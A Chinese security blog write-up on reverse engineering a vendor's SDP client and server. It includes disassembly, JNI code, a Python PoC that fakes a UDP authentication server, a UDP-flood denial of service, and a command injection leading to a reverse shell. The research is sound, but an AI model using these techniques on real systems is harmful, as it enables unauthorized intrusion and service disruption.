记一次安全产品的漏洞挖掘

admin 2022年6月27日19:17:57安全文章评论9 views19760字阅读65分52秒阅读模式

记一次安全产品的漏洞挖掘

本文为看雪论坛精华文章
看雪论坛作者ID:blck四





背景


一个月前拿来了一家安全厂商的SDP产品玩了一段时间,这周抽几天时间看了一下挖了个命令注入还算有个交代,文中如晚辈有错误的地方不吝赐教。




程序分析


逆向分析是花了个把月时间,断断续续的抽时间和周末把客户端程序和服务端基本分析的差不多了,这里摘出流程性的东西,涉及商密的马赛克了毕竟是商业软件,遵守一下职业操守。

下面客户端和服务端我用C-S来表示,C端主要的功能都在动态库里头,导出表大概45个函数,中间都是主程序通过loadlibrary和GetProcAddress得到动态链接库函数地址来调用函数。
   
记一次安全产品的漏洞挖掘
 

记一次安全产品的漏洞挖掘

1、第一这里会抽取【userid(用户名);uuid(用户id);devtype(设备类型);authcod(验证码);devid(设备id);password(密码)】这6个条件进行加密。

2、第二步抽取系统环境信息,这里直接贴汇编把敏感字做了批量替换处理,懒得截图打马了。
000007FEEF8B4946  | FF 15 04 98 0D 00              | call qword ptr ds:[<&RtlEnterCriticalSe |000007FEEF8B494C  | 39 1D 62 F5 1A 00              | cmp dword ptr ds:[7FEEFA63EB4],ebx      |000007FEEF8B4952  | 0F 85 AB 02 00 00              | jne bdsecuritysse.7FEEF8B4C03               |000007FEEF8B4958  | 48 8D 0D A1 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE400]      |000007FEEF8B495F  | FF 15 C3 9B 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B4965  | 48 8D 0D AC 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE418]      |000007FEEF8B496C  | 48 89 05 F5 F5 1A 00           | mov qword ptr ds:[7FEEFA63F68],rax      |000007FEEF8B4973  | FF 15 AF 9B 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B4979  | 48 8D 0D A8 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE428]      |000007FEEF8B4980  | 48 89 05 E9 F5 1A 00           | mov qword ptr ds:[7FEEFA63F70],rax      |000007FEEF8B4987  | FF 15 9B 9B 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B498D  | 48 8D 0D A4 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE438]      |000007FEEF8B4994  | 48 89 05 DD F5 1A 00           | mov qword ptr ds:[7FEEFA63F78],rax      |000007FEEF8B499B  | FF 15 87 9B 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B49A1  | 48 8D 0D A0 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE448]      |000007FEEF8B49A8  | 48 89 05 D1 F5 1A 00           | mov qword ptr ds:[7FEEFA63F80],rax      |000007FEEF8B49AF  | FF 15 73 9B 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B49B5  | 48 8D 0D 9C 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE458]      |000007FEEF8B49BC  | 48 89 05 C5 F5 1A 00           | mov qword ptr ds:[7FEEFA63F88],rax      |000007FEEF8B49C3  | FF 15 5F 9B 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B49C9  | 48 8D 0D 90 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE460]      |000007FEEF8B49D0  | 48 89 05 B9 F5 1A 00           | mov qword ptr ds:[7FEEFA63F90],rax      |000007FEEF8B49D7  | FF 15 4B 9B 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B49DD  | 48 8D 0D 94 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE478]      |000007FEEF8B49E4  | 48 89 05 AD F5 1A 00           | mov qword ptr ds:[7FEEFA63F98],rax      |000007FEEF8B49EB  | FF 15 37 9B 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B49F1  | 48 8D 0D 98 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE490]      |000007FEEF8B49F8  | 48 89 05 A1 F5 1A 00           | mov qword ptr ds:[7FEEFA63FA0],rax      |000007FEEF8B49FF  | FF 15 23 9B 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B4A05  | 48 8D 0D 9C 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE4A8]      |000007FEEF8B4A0C  | 48 89 05 95 F5 1A 00           | mov qword ptr ds:[7FEEFA63FA8],rax      |000007FEEF8B4A13  | FF 15 0F 9B 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B4A19  | 48 8D 0D 98 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE4B8]      |000007FEEF8B4A20  | 48 89 05 89 F5 1A 00           | mov qword ptr ds:[7FEEFA63FB0],rax      |000007FEEF8B4A27  | FF 15 FB 9A 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B4A2D  | 48 8D 0D 9C 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE4D0]      |000007FEEF8B4A34  | 48 89 05 7D F5 1A 00           | mov qword ptr ds:[7FEEFA63FB8],rax      |000007FEEF8B4A3B  | FF 15 E7 9A 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B4A41  | 48 8D 0D 90 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE4D8]      |000007FEEF8B4A48  | 48 89 05 71 F5 1A 00           | mov qword ptr ds:[7FEEFA63FC0],rax      |000007FEEF8B4A4F  | FF 15 D3 9A 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B4A55  | 48 8D 0D 8C 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE4E8]      |000007FEEF8B4A5C  | 48 89 05 65 F5 1A 00           | mov qword ptr ds:[7FEEFA63FC8],rax      |000007FEEF8B4A63  | FF 15 BF 9A 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B4A69  | 48 8D 0D 90 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE500]      |000007FEEF8B4A70  | 48 89 05 59 F5 1A 00           | mov qword ptr ds:[7FEEFA63FD0],rax      |000007FEEF8B4A77  | FF 15 AB 9A 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B4A7D  | 48 8D 0D 8C 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE510]      |000007FEEF8B4A84  | 48 89 05 4D F5 1A 00           | mov qword ptr ds:[7FEEFA63FD8],rax      |000007FEEF8B4A8B  | FF 15 97 9A 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B4A91  | 48 8D 0D 88 9A 13 00           | lea rcx,qword ptr ds:[7FEEF9EE520]      |000007FEEF8B4A98  | 48 89 05 41 F5 1A 00           | mov qword ptr ds:[7FEEFA63FE0],rax      |000007FEEF8B4A9F  | FF 15 83 9A 0D 00              | call qword ptr ds:[<&_strdup>]          |000007FEEF8B4AA5  | 48 8D 0D 34 F4 1A 00           | lea rcx,qword ptr ds:[7FEEFA63EE0]      |000007FEEF8B4AAC  | 48 89 05 35 F5 1A 00           | mov qword ptr ds:[7FEEFA63FE8],rax      |000007FEEF8B4AB3  | E8 28 03 00 00                 | call bdsecuritysse.7FEEF8B4DE0              |000007FEEF8B4AB8  | 48 8D 0D 29 F4 1A 00           | lea rcx,qword ptr ds:[7FEEFA63EE8]      |000007FEEF8B4ABF  | 89 05 2B F5 1A 00              | mov dword ptr ds:[7FEEFA63FF0],eax      |000007FEEF8B4AC5  | E8 86 08 00 00                 | call bdsecuritysse.7FEEF8B5350              |000007FEEF8B4ACA  | 48 8D 0D 1F F4 1A 00           | lea rcx,qword ptr ds:[7FEEFA63EF0]      |000007FEEF8B4AD1  | 89 05 1D F5 1A 00              | mov dword ptr ds:[7FEEFA63FF4],eax      |000007FEEF8B4AD7  | E8 E4 0D 00 00                 | call bdsecuritysse.7FEEF8B58C0              |000007FEEF8B4ADC  | 48 8D 0D 15 F4 1A 00           | lea rcx,qword ptr ds:[7FEEFA63EF8]      |000007FEEF8B4AE3  | 89 05 0F F5 1A 00              | mov dword ptr ds:[7FEEFA63FF8],eax      |000007FEEF8B4AE9  | E8 42 12 00 00                 | call bdsecuritysse.7FEEF8B5D30              |000007FEEF8B4AEE  | 48 8D 0D 0B F4 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F00]      |000007FEEF8B4AF5  | 89 05 01 F5 1A 00              | mov dword ptr ds:[7FEEFA63FFC],eax      |000007FEEF8B4AFB  | E8 20 19 00 00                 | call bdsecuritysse.7FEEF8B6420              |000007FEEF8B4B00  | 48 8D 0D 01 F4 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F08]      |000007FEEF8B4B07  | 89 05 F3 F4 1A 00              | mov dword ptr ds:[7FEEFA64000],eax      |000007FEEF8B4B0D  | E8 7E 1E 00 00                 | call bdsecuritysse.7FEEF8B6990              |000007FEEF8B4B12  | 48 8D 0D F7 F3 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F10]      |000007FEEF8B4B19  | 89 05 E5 F4 1A 00              | mov dword ptr ds:[7FEEFA64004],eax      |000007FEEF8B4B1F  | E8 BC 22 00 00                 | call bdsecuritysse.7FEEF8B6DE0              |000007FEEF8B4B24  | 48 8D 0D ED F3 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F18]      |000007FEEF8B4B2B  | 89 05 D7 F4 1A 00              | mov dword ptr ds:[7FEEFA64008],eax      |000007FEEF8B4B31  | E8 1A 28 00 00                 | call bdsecuritysse.7FEEF8B7350              |000007FEEF8B4B36  | 48 8D 0D E3 F3 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F20]      |000007FEEF8B4B3D  | 89 05 C9 F4 1A 00              | mov dword ptr ds:[7FEEFA6400C],eax      |000007FEEF8B4B43  | E8 28 2A 00 00                 | call bdsecuritysse.7FEEF8B7570              |000007FEEF8B4B48  | 48 8D 0D D9 F3 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F28]      |000007FEEF8B4B4F  | 89 05 BB F4 1A 00              | mov dword ptr ds:[7FEEFA64010],eax      |000007FEEF8B4B55  | E8 26 2D 00 00                 | call bdsecuritysse.7FEEF8B7880              |000007FEEF8B4B5A  | 89 05 B4 F4 1A 00              | mov dword ptr ds:[7FEEFA64014],eax      |000007FEEF8B4B60  | 48 8D 0D C9 F3 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F30]      |000007FEEF8B4B67  | E8 E4 2D 00 00                 | call bdsecuritysse.7FEEF8B7950              |000007FEEF8B4B6C  | 48 8D 0D C5 F3 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F38]      |000007FEEF8B4B73  | 89 05 9F F4 1A 00              | mov dword ptr ds:[7FEEFA64018],eax      |000007FEEF8B4B79  | E8 E2 34 00 00                 | call bdsecuritysse.7FEEF8B8060              |000007FEEF8B4B7E  | 48 8D 0D BB F3 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F40]      |000007FEEF8B4B85  | 89 05 91 F4 1A 00              | mov dword ptr ds:[7FEEFA6401C],eax      |000007FEEF8B4B8B  | E8 40 3A 00 00                 | call bdsecuritysse.7FEEF8B85D0              |000007FEEF8B4B90  | 48 8D 0D B1 F3 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F48]      |000007FEEF8B4B97  | 89 05 83 F4 1A 00              | mov dword ptr ds:[7FEEFA64020],eax      |000007FEEF8B4B9D  | E8 3E 3B 00 00                 | call bdsecuritysse.7FEEF8B86E0              |000007FEEF8B4BA2  | 48 8D 0D A7 F3 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F50]      |000007FEEF8B4BA9  | 89 05 75 F4 1A 00              | mov dword ptr ds:[7FEEFA64024],eax      |000007FEEF8B4BAF  | E8 8C 3C 00 00                 | call bdsecuritysse.7FEEF8B8840              |000007FEEF8B4BB4  | 48 8D 0D 9D F3 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F58]      |000007FEEF8B4BBB  | 89 05 67 F4 1A 00              | mov dword ptr ds:[7FEEFA64028],eax      |000007FEEF8B4BC1  | E8 DA 42 00 00                 | call bdsecuritysse.7FEEF8B8EA0              |000007FEEF8B4BC6  | 48 8D 0D 93 F3 1A 00           | lea rcx,qword ptr ds:[7FEEFA63F60]      |000007FEEF8B4BCD  | 89 05 59 F4 1A 00              | mov dword ptr ds:[7FEEFA6402C],eax      |000007FEEF8B4BD3  | E8 38 42 00 00                 | call bdsecuritysse.7FEEF8B8E10              |000007FEEF8B4BD8  | 48 8D 15 55 F4 1A 00           | lea rdx,qword ptr ds:[7FEEFA64034]      |000007FEEF8B4BDF  | 89 05 4B F4 1A 00              | mov dword ptr ds:[7FEEFA64030],eax      |000007FEEF8B4BE5  | 48 8D 05 04 F4 1A 00           | lea rax,qword ptr ds:[7FEEFA63FF0]      |000007FEEF8B4BEC  | 0F 1F 40 00                    | nop dword ptr ds:[rax]                  |000007FEEF8B4BF0  | 8B 08                          | mov ecx,dword ptr ds:[rax]              |

获取【cpu;bios;harddisk;os_version;ie_core;graphic_driver_version;sound_driver_version;run_memory;run_process_list;nic_mac;systemharddisk;ip_address;hostname;Vmware】通过UDP协议发送到S端,方便之后定时发现里头的数据发生改变后,就对用户进行重新身份验证。后面的就是S端处理是个linux系统,有个C++底层负责对C端的交互和日志记录,还有把传过来的UDP数据包转换成HTTP请求发送给java处理,业务层这块采用的是微服务架构spring cloud eureka,S端得话导出函数相对比较多了,1300多个(包括系统导出函数)。
text:000000000040EF98                 push    rbp.text:000000000040EF99                 mov     rbp, rsp.text:000000000040EF9C                 sub     rsp, 0CF0h.text:000000000040EFA3                 mov     [rbp+token], rdi.text:000000000040EFAA                 mov     [rbp+ret], 0.text:000000000040EFB1                 mov     [rbp+cookie], 0.text:000000000040EFB9                 mov     [rbp+data], 0.text:000000000040EFC1                 lea     rsi, [rbp+post_buff].text:000000000040EFC8                 mov     eax, 0.text:000000000040EFCD                 mov     edx, 100h.text:000000000040EFD2                 mov     rdi, rsi.text:000000000040EFD5                 mov     rcx, rdx.text:000000000040EFD8                 rep stosq.text:000000000040EFDB                 lea     rsi, [rbp+http_response].text:000000000040EFE2                 mov     eax, 0.text:000000000040EFE7                 mov     edx, 7.text:000000000040EFEC                 mov     rdi, rsi.text:000000000040EFEF                 mov     rcx, rdx.text:000000000040EFF2                 rep stosq.text:000000000040EFF5                 mov     [rbp+ptr_1000], 0.text:000000000040EFFD                 mov     [rbp+str_1000], offset a1000 ; "1000".text:000000000040F005                 lea     rsi, [rbp+c_uri_api].text:000000000040F00C                 mov     eax, 0.text:000000000040F011                 mov     edx, 40h ; '@'.text:000000000040F016                 mov     rdi, rsi.text:000000000040F019                 mov     rcx, rdx.text:000000000040F01C                 rep stosq.text:000000000040F01F                 mov     rax, cs:g_running_conf.remote_host.text:000000000040F026                 test    rax, rax.text:000000000040F029                 jz      short loc_40F043.text:000000000040F02B                 movzx   eax, cs:g_running_conf.remote_port.text:000000000040F032                 test    ax, ax.text:000000000040F035                 jz      short loc_40F043.text:000000000040F037                 mov     rax, cs:g_running_conf.remote_uri_head.text:000000000040F03E                 test    rax, rax.text:000000000040F041                 jnz     short loc_40F04D.text:000000000040F043.text:000000000040F043 loc_40F043:                             ; CODE XREF: x+91↑j.text:000000000040F043                                         ; x+9D↑j.text:000000000040F043                 mov     eax, 0FFFFDCD8h.text:000000000040F048                 jmp     locret_41091C.text:000000000040F04D ; ---------------------------------------------------------------------------.text:000000000040F04D.text:000000000040F04D loc_40F04D:                             ; CODE XREF: x+A9↑j.text:000000000040F04D                 mov     rdx, cs:g_running_conf.remote_uri_head.text:000000000040F054                 lea     rax, [rbp+c_uri_api].text:000000000040F05B                 mov     r8d, offset aMapi01SpaVerif ; .text:000000000040F061                 mov     rcx, rdx.text:000000000040F064                 mov     edx, offset aSS_0 ; "%s%s".text:000000000040F069                 mov     esi, 200h       ; maxlen.text:000000000040F06E                 mov     rdi, rax        ; s.text:000000000040F071                 mov     eax, 0.text:000000000040F076                 call    _snprintf.text:000000000040F07B                 mov     [rbp+cookie], offset aCmSessionZdg2m ; .text:000000000040F083                 mov     rdx, [rbp+token].text:000000000040F08A                 lea     rax, [rbp+post_buff].text:000000000040F091                 mov     rcx, rdx.text:000000000040F094                 mov     edx, offset aTokenS ; "{"token":"%s"}".text:000000000040F099                 mov     esi, 800h       ; maxlen.text:000000000040F09E                 mov     rdi, rax        ; s

这里直接把认证auth写死在了HTTP当中,那控制器对网关的交互不需要校验了......

如果知道网关的地址任何一台机器可以都直接对网关操作了?
POST /authn/mapi/01/spa/init/apply HTTP/1.1Host: xxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36Cache-Control: no-cacheAccept: */*Cookie: 已打码Content-type: application/jsonContent-Length: 329 {"token":"04C3C23F2C0A6F2562dfg3331163179F97F107FAhpE/OIGLhE5dRJTpVx2yw2uDl1vlxdGbP6IfAb2++r2MRb8Jy94wj2qh875TueA1lVw72gfosHBRtLXnDrd1vMeC1SgJM1UkWjKrS/VYDluXbpNmdjCnpsJqIHbcaiKFpcwmPZJHjjxWhvVGDnXLu/3iv6do6hCCMgparCzSaYFa40K/psaANzjgjZbJ9BLDzDS0xWS5gE2zgulP1olF7sZY7WcIyTFKlX7mnAGsqXY=-1001756NlTYtA0TchCrDoNe1VJszqYECU4jXasmPewY="}

解密的实现操作在jni里头,后续业务逻辑的操作在java端,jar的话用jd-gui就全部反编译出来了密钥啥的都在里头- -,java端采用了微服务架构就是先通过网关的端口转发到注册服务函数处理。
    记一次安全产品的漏洞挖掘

再跟到处理校验认证的类,看看实现。
记一次安全产品的漏洞挖掘
记一次安全产品的漏洞挖掘

经过securityTokenDecode函数,发现在另一个jar包。
记一次安全产品的漏洞挖掘

记一次安全产品的漏洞挖掘


通过jni调用了C,实现还是在C里,找到System.loadLibrary("xxx") 并反汇编:
.text:000000000011C409                 lea     rdx, gMethods.text:000000000011C410                 lea     rcx, aProcesscmd ; "processCmd".text:000000000011C417                 mov     [rax+rdx], rcx.text:000000000011C41B                 mov     eax, [rbp+var_4].text:000000000011C41E                 movsxd  rdx, eax.text:000000000011C421                 mov     rax, rdx.text:000000000011C424                 add     rax, rax.text:000000000011C427                 add     rax, rdx.text:000000000011C42A                 shl     rax, 3.text:000000000011C42E                 lea     rdx, gMethods.text:000000000011C435                 lea     rcx, aIljavaLangObje ; "(ILjava/lang/Object;[Ljava/lang/Object;"....text:000000000011C43C                 mov     [rax+rdx+8], rcx.text:000000000011C441                 mov     eax, [rbp+var_4].text:000000000011C444                 movsxd  rdx, eax.text:000000000011C447                 mov     rax, rdx.text:000000000011C44A                 add     rax, rax.text:000000000011C44D                 add     rax, rdx.text:000000000011C450                 shl     rax, 3.text:000000000011C454                 lea     rdx, unk_548810.text:000000000011C45B                 lea     rcx, jni_process_command.text:000000000011C462                 mov     [rax+rdx], rcx.text:000000000011C466                 add     [rbp+var_4], 1.text:000000000011C46A                 mov     edx, [rbp+var_4].text:000000000011C46D                 mov     rax, [rbp+var_18].text:000000000011C471                 mov     ecx, edx.text:000000000011C473                 lea     rdx, gMethods.text:000000000011C47A                 lea     rsi, aComxxxSdkAl ; "com/xxx/sdk/".text:000000000011C481                 mov     rdi, rax.text:000000000011C484                 call    registerNativeMethods

调用了registerNativeMethods

函数原型:
static int registerNativeMethods(JNIEnv* env, const char* className,    JNINativeMethod* gMethods, int numMethods){    jclass clazz;    //注册函数需要和对应类挂钩,这里先取地对应类    clazz = env->FindClass(className);    if (clazz == NULL)        return JNI_FALSE;     if (env->RegisterNatives(clazz, gMethods, numMethods) < 0)    {        //LOGE("register nativers error");        return JNI_FALSE;    }     return JNI_TRUE;}

JNI_Onload:
__int64 __fastcall JNI_OnLoad(__int64 a1){  __int64 result; // rax  __int64 v2; // rdi  __int64 v3; // [rsp+10h] [rbp-10h] BYREF  int v4; // [rsp+18h] [rbp-8h]  int v5; // [rsp+1Ch] [rbp-4h]   v3 = 0LL;  v5 = -1;  v4 = 0;  memset(cmd_id_list, 0, sizeof(cmd_id_list));  memset(jni_func_list, 0, sizeof(jni_func_list));  if ( (*(*a1 + 060LL))(a1, &v3, 65540LL) )    return 0xFFFFFFFFLL;  v2 = v3;  if ( !registerNatives(v3) )    return 0xFFFFFFFFLL;  v4 = _s201603301100(v2);  if ( v4 )    result = 0xFFFFFFFFLL;  else    result = 65540LL;  return result;}
_QWORD *__fastcall register_command_processor(int a1, __int64 a2){  _QWORD *result; // rax  int i; // [rsp+1Ch] [rbp-4h]   for ( i = 0; i <= 511; ++i )  {    result = jni_func_list[i];    if ( !result )    {      cmd_id_list[i] = a1;      result = jni_func_list;      jni_func_list[i] = a2;      return result;    }  }  return result;}


注册jni函数
__int64 registerNatives(){  register_command_processor(7854, randomSM2KeyPairs);  register_command_processor(7853, sm2Encrypt);  register_command_processor(7852, sm2Decrypt);  register_command_processor(7851, sm2DoSign);  register_command_processor(7850, sm2VerifySign);  register_command_processor(7849, sm3HashWithData);  register_command_processor(7848, sm3HashWithFilePath);  register_command_processor(7847, randomSM4IV);  register_command_processor(7846, randomSM4Key);  register_command_processor(7845, sm4EncryptData);  register_command_processor(7844, sm4DecryptData);  register_command_processor(7843, sm4EncryptFile);  register_command_processor(7842, sm4DecryptFile);  register_command_processor(7841, randomAESGCM128Key);  register_command_processor(7840, aesGcm128EncryptData);  register_command_processor(7871, aesGcm128DecryptData);  register_command_processor(7870, randomRSAKeyPairs);  register_command_processor(7869, rsaEncrypt);  register_command_processor(7868, rsaDecrypt);  register_command_processor(7867, rsaDoSign);  register_command_processor(7866, rsaVerifySign);  register_command_processor(7865, md5Data);  register_command_processor(7864, sha1Data);  register_command_processor(7863, sha224Data);  register_command_processor(7862, sha256Data);  register_command_processor(7861, hmacMD5Data);  register_command_processor(7860, hmacSHA1Data);  register_command_processor(7859, hmacSHA256Data);  register_command_processor(7858, aes256Encrypt);  register_command_processor(7857, aes256Decrypt);  register_command_processor(7856, sha512Data);  register_command_processor(7823, hmacSHA512Data);  register_command_processor(7822, hmacSM3Data);  register_command_processor(7839, collaboSM2ClientGenKeypairs);  register_command_processor(7838, collaboSM2ServerGenKeypairs);  register_command_processor(7837, collaboSM2ClientFristDoSign);  register_command_processor(7836, collaboSM2ServerDoSign);  register_command_processor(7835, collaboSM2ClientSecondDoSign);  register_command_processor(7834, SSEcollaboSM2ServerProcessGenKeypairs);  register_command_processor(7833, SSEcollaboSM2ServerProcessDoSign);  register_command_processor(7761, xxxx);  register_command_processor(7760, xxxx);  register_command_processor(7359, xxxx);  register_command_processor(7358, xxxx);  register_command_processor(7342, xxxx);  register_command_processor(7341, xxxx);  register_command_processor(7340, xxxx);  register_command_processor(7339, xxxx);  return 1LL;}

通过注册函数和对应类解密函数:

记一次安全产品的漏洞挖掘


jni函数表

记一次安全产品的漏洞挖掘


之后解密后进数据库(使用了#{}来防SQL注入):
记一次安全产品的漏洞挖掘

根据逻辑返回相对应的status给C端,以上就是第一步身份验证的流程。
身份校验通过后进入第二流程,得到控制器IP和端口开始登陆。

请求数据包如下:

记一次安全产品的漏洞挖掘

调试器附加进程:内容依旧带上了上面的用户名密码验证码信息外加了一个json ext字段包含了两个内容:codetoken,pubkey。

看看S端得处理逻辑,这里简单说一下流程,不贴代码了。

S端底层获取到数据后发送到相应得注册服务,服务函数里逻辑为:解密数据包、检测用户是否存在、检测codetoken是否为空、检查手机号、检查pubkey是否为空(key客户端生成,服务端不会去校验它的真实性),一顿的逻辑检查通过后【uuid,userid,时间,设备类型,pubkey,clientype】入库,最后获取隧道的相关配置信息返还给C端。

隧道配置内容:
{"allowedips": , "dns": "", "portaluri": "", "riskuri": "" }

生成一个配置文件后创建隧道服务:
00000000007E6A27  | 48 89 54 24 50                 | mov qword ptr ss:[rsp+50],rdx           |00000000007E6A2C  | 48 89 04 24                    | mov qword ptr ss:[rsp],rax              | [rsp]:"WireGuardTunnel$controller"00000000007E6A30  | 48 89 4C 24 08                 | mov qword ptr ss:[rsp+8],rcx            |00000000007E6A35  | E8 66 C8 00 00                 | call client.7F32A0                   |

最后就是每次连接就走指定的某隧道就行了,基本的流程摸透了,最后写一下发现的安全问题。




漏洞


刚开始基本测了一周左右,发现了几个安全问题,比较有价值的就是一个拒绝服务还有加密协议的加密密钥来重新实现加密传输就可以暴力猜账号密码,这两天也挖了服务端一个远程命令注入。

首先产品说明文档里带了一个产品部署的架构图,这里脱下敏,自己照猫画虎画了一个差不多的图。
记一次安全产品的漏洞挖掘

从完全黑盒测试的角度就只有一个客户端,对于服务端的所有信息除了IP地址外,没有任何其他有用的信息。

1.认证机制绕过


C到S传输协议UDP,并经过某种加密进行传输,过程中没有协商之类的,看一眼抓包数据:

记一次安全产品的漏洞挖掘

可以实现一个S端不管发送什么数据只给他一个成功的状态码就能欺骗到登录成功的界面,这里需要满足两个条件:

1、需要一个成功的状态码数据包或information。

2、没有二次校验的机制。


写了一个S端进行了测试,成功绕过了第一层校验到达登陆页面的时候才发现有二次校验的机制,之后二次校验的包来回分析发现了在第一步的校验包中会有一个设备ID的hash码要存入S的数据库中,在二次校验中会对设备HASH码查询来校验第一步的认证,此路是行不通。

POC:
#-*- encoding: utf-8 -*-from socket import *from time import ctimeimport sysimport binascii reload(sys)sys.setdefaultencoding('utf-8')  HOST = ''PORT = 4430BUFSIZ = 5000ADDRESS = (HOST, PORT) udpServerSocket = socket(AF_INET, SOCK_DGRAM)udpServerSocket.bind(ADDRESS)      # 绑定客户端口和地址 while True:    print("waiting for message...")    data, addr = udpServerSocket.recvfrom(BUFSIZ)    print("接收到数据:")    content = "x66x00x00x00x00x8cx00x00x00x00x00x00x00x00x00x0a"                 "x00x02x00x50x7bx55x73x74x61x74x75x73x22x3ax31x30"                 "x30x30x2cx22x72x65x73x70x6fx6ex73x65x5fx62x6fx64"                 "x79x22x3ax7bx22x63x6fx64x65x74x6fx6bx65x6ex22x3a"                 "x22x31x66x34x33x32x34x63x33x36x38x31x63x34x33x35"                 "x36x62x61x33x35x31x66x66x62x37x35x39x34x33x36x66"                 "x36x22x7dx7dx00x03x00x04x00x00x00x00x00x00x00x00"                 "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"                 "x00x00x00x00x00x00x00x00x00x00x00x00"    #################################################################################    udpServerSocket.sendto(content, addr)    print('...received from and returned to:', addr)     print("waiting for message...")    data, addr = udpServerSocket.recvfrom(BUFSIZ)    print("接收到数据:2222")    content1 = "x00x0cx29xb0x3ax07x84x65x69x6exdax22x08x00x45x00" "x02x0cxe1xdex40x00x3fx11xc3xf1xc0xa8x0ax16xc0xa8" "x08xaax11x4exe3x54x01xf8xa6x1ex68x00x00x00x01xf0" "x00x00x00x00x00x00x00x00x51x0ax00x02x01xb4x7bx22" "x73x74x61x74x75x73x22x3ax31x30x30x30x2cx22x72x65" "x73x70x6fx6ex73x65x5fx62x6fx64x79x22x3ax7bx22x73" "x64x70x5fx63x6cx69x65x6ex74x5fx63x6fx6ex66x22x3a" "x7bx22x61x6cx6cx6fx77x65x64x69x70x73x22x3ax5bx22" "x31x30x2ex30x2ex30x2ex31x2fx33x32x22x2cx22x31x39" "x32x2ex31x36x38x2ex31x30x2ex30x2fx31x36x22x2cx22" "x31x37x32x2ex31x36x2ex30x2ex30x2fx31x36x22x5dx2c" "x22x70x6fx72x74x61x6cx75x72x69x22x3ax22x68x74x74" "x70x3ax2fx2fx31x30x2ex30x2ex30x2ex31x3ax31x32x30" "x30x30x2fx6cx6fx67x69x6ex2ex68x74x6dx6cx22x2cx22" "x72x69x73x6bx75x72x69x22x3ax22x68x74x74x70x3ax2f" "x2fx31x30x2ex30x2ex30x2ex31x3ax38x31x30x30x2fx61" "x75x74x68x6ex2fx6dx61x70x69x2fx30x31x2fx73x70x61" "x2fx72x69x73x6bx22x2cx22x64x6ex73x22x3ax22x31x30" "x2ex30x2ex30x2ex31x22x7dx2cx22x74x6fx6bx65x6ex22" "x3ax22x45x43x31x44x44x42x32x39x37x32x32x38x35x43" "x38x31x31x39x39x33x43x36x41x33x45x32x31x44x37x45" "x37x31x6cx50x50x48x6cx50x63x52x74x5ax74x64x6ax32" "x65x7ax4cx4ax4ex78x4cx6ax4fx36x76x76x63x31x53x65" "x55x63x46x55x69x6ax52x5ax37x66x2fx4ax49x50x37x46" "x51x67x2fx4ax47x4bx70x6ax70x34x50x31x6cx42x62x75" "x6bx36x50x35x7ax53x5ax69x37x6fx59x7ax58x6ax6dx67" "x4ex69x41x44x66x2fx37x44x74x55x78x59x52x6ex52x69" "x6dx56x6ax7ax43x47x74x78x4cx43x4dx54x6fx3dx2dx31" "x30x30x31x45x49x74x50x6cx48x6dx76x67x4cx4ex37x5a" "x55x68x79x75x47x4dx6fx36x62x33x68x4ex2fx6cx4bx36" "x6fx7ax44x4ex30x38x73x69x56x79x2fx66x6ex45x3dx22" "x7dx7dx00x03x00x04x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00x00x00"     udpServerSocket.sendto(content1, addr)    print('...received from and returned to:', addr) udpServerSocket.close()

2.拒绝服务


自己模拟了一个客户端然后再data包中参杂各种垃圾数据之后疯狂发包,3s之内服务就死了,让其他同事去链接已经处于拒绝服务的状态了,这里没什么好说的了只需要不停的对目标发送udp包就行了。

3.命令注入


记一次安全产品的漏洞挖掘

系统调用system中传入的参数直接接收之后使用且a1可控。
记一次安全产品的漏洞挖掘
那么只需要让shell把我们输入的字符串当成系统命令去执行就可以执行任意命令。

找到漏洞模块
记一次安全产品的漏洞挖掘

记一次安全产品的漏洞挖掘

Touch 一个文件,好的已经完成。
记一次安全产品的漏洞挖掘

反弹一个shell获得控制权。

